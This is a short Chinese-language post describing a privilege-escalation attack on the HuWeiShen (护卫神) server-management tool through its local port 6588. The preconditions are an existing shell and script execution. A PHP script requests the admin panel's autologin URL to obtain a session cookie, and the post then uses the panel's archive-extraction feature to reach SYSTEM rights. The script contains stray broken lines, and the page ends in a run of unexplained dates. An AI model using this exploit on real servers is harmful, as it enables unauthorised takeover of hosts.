护卫神6588端口提权

利用条件:
1.有shell
2.有可执行脚本

<?php
function httpGet() {
    $url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
echo asd;
?

拿到的cookie拿去后台登陆利用支持解压包以护卫神的system权限达到提权的目的

2021-05-08
2022-12-23
2022-12-23
2022-12-23
2021-08-10
2022-12-23
2022-01-01
2021-08-02